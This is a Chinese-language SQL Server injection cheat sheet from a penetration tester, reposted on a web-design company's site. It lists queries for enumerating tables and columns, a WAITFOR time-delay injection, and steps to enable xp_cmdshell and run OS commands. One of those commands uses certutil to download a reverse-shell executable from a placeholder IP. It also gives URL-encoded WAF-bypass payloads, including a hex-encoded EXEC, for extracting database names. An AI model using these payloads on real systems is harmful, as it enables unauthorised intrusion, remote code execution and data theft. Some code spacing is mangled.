如何進(jìn)行SQLServer注入的分析

這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行SQL Server 注入的分析，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

10多年的濰城網(wǎng)站建設(shè)經(jīng)驗(yàn)，針對(duì)設(shè)計(jì)、前端、開發(fā)、售后、文案、推廣等六對(duì)一服務(wù)，響應(yīng)快，48小時(shí)及時(shí)工作處理。成都營(yíng)銷網(wǎng)站建設(shè)的優(yōu)勢(shì)是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同，自動(dòng)調(diào)整濰城建站的顯示方式，使網(wǎng)站能夠適用不同顯示終端，在瀏覽器中調(diào)整網(wǎng)站的寬度，無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站，都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì)，從而大程度地提升瀏覽體驗(yàn)。成都創(chuàng)新互聯(lián)公司從事“濰城網(wǎng)站設(shè)計(jì)”,“濰城網(wǎng)站推廣”以來(lái)，每個(gè)客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。

在實(shí)習(xí)的滲透測(cè)試項(xiàng)目中，遇到的數(shù)據(jù)庫(kù)系統(tǒng)絕大部分是SQL Server。也算是了解和熟悉Mssql 的一個(gè)重要過(guò)程吧。

獲取某數(shù)據(jù)庫(kù)的所有表（假設(shè)庫(kù)名為fooDB）

--XType='U':表示所有用戶表;

--XType='S':表示所有系統(tǒng)表;

SELECTname FROM fooDB..sysobjects Where xtype='U';

獲取某表所有字段名（假設(shè)表名為fooTable）

SELECTname FROM SysColumns WHERE id=Object_id('fooTable');

延時(shí)注入

SELECT* FROM fooTable WHERE id=1 WAITFOR DELAY '0:0:3';

2、常用內(nèi)置函數(shù)

db_name()-- 當(dāng)前庫(kù)名

user-- 當(dāng)前用戶名

suser_name()-- 登陸用戶名

3、like查詢大小寫敏感模式

SELECT* FROM dt WHERE columnname COLLATE Chinese_PRC_CS_AS LIKE 'aa%';　

舉例分析Chinese_PRC_CS_AI_WS：

前半部份：指 UNICODE字符集，Chinese_PRC_指針對(duì)大陸簡(jiǎn)體字UNICODE 的排序規(guī)則。

_BIN 二進(jìn)制排序

_CI(CS) 是否區(qū)分大小寫，CI不區(qū)分，CS區(qū)分

_AI(AS) 是否區(qū)分重音，AI不區(qū)分，AS區(qū)分

_KI(KS) 是否區(qū)分假名類型，KI不區(qū)分，KS區(qū)分

_WI(WS) 是否區(qū)分寬度，WI不區(qū)分，WS區(qū)分

4、實(shí)現(xiàn)limitm,n

查詢結(jié)果中第7 條到第 9條記錄，如 MySQL中的 limit 7,3

selecttop 3 id from tablename

whereid not in (

selecttop 6 id from tablename

)

開啟xp_cmdshell存儲(chǔ)過(guò)程

EXECsp_configure 'show advanced options', 1;

RECONFIGURE;

EXECsp_configure 'xp_cmdshell', 1;

RECONFIGURE;

關(guān)閉只需將開啟語(yǔ)句的第二個(gè)1改成0再執(zhí)行即可

運(yùn)行命令

execmaster..xp_cmdshell "whoami";

execmaster..xp_cmdshell "ping 127.0.0.1 -n 5 > nul";

execmaster..xp_cmdshell "certutil -urlcache -split -fhttp://IP/re_shell.exe D:\re_shell.exe";

徹底防御xp_cmdshell方法：修復(fù)sql注入漏洞、刪除xplog70.dll 組件

and可用：?key=aa'+and+db_name()>1

and不可用：?key='%2buser()^1

convert轉(zhuǎn)換類型：?key=a'%2b(convert(int,@@version))

; dEcLaRe @s vArChAr(8000) sEt

@s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29eXeC(@s)-- -

2、有趣的繞過(guò)例子輸入單引號(hào)時(shí)會(huì)報(bào)錯(cuò)

嘗試%23和--+-的注釋來(lái)判斷后端數(shù)據(jù)庫(kù)系統(tǒng)類型。語(yǔ)句出錯(cuò)的時(shí)候返回200并報(bào)錯(cuò)。正確的時(shí)候是302?？芍獮閙ssql。

服務(wù)端對(duì)數(shù)據(jù)進(jìn)行了攔截和過(guò)濾，拒絕處理請(qǐng)求。然而可利用varchar^int 來(lái)爆出數(shù)據(jù)。

?appSysCode='%2buser%5e1--+-

攔截有點(diǎn)厲害。嘗試了許多select方式都不行。

?appSysCode=a'%2b(select+'aaa')--+-

?appSysCode=a'%2b(select+1)%5e1--+-

?appSysCode=a'%2b(convert(int,(select+'bbb')))%5e1--+-（這里只有a報(bào)錯(cuò)）

?appSysCode=a'%2b(convert(varchar,(select+'bbb')))%5e1--+-（這里直接302）

?appSysCode=a'%2b(convert(int,(select+'bbb')))--+-

?appSysCode=a'%3bSELECT+11--+-

?appSysCode=a'%3bexec+xxxxx--+-

不過(guò)還是存在規(guī)則缺陷的。

?appSysCode=a'%3bselect+*+from+(select+'aaa'+as+c)+t2+where+c%5e1=0--+-

可爆出任意數(shù)據(jù)

?appSysCode=a'%3bSELECT+name+FROM+master..sysdatabases+where+name%5e1%3e0+and+name+NOT+IN+('master','model','msdb','tempdb','northwind','pubs')--+-

關(guān)于如何進(jìn)行SQL Server 注入的分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。

本文標(biāo)題：如何進(jìn)行SQLServer注入的分析
本文鏈接：http://bm7419.com/article30/psoipo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供建站公司、用戶體驗(yàn)、服務(wù)器托管、微信公眾號(hào)、網(wǎng)站導(dǎo)航、ChatGPT

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)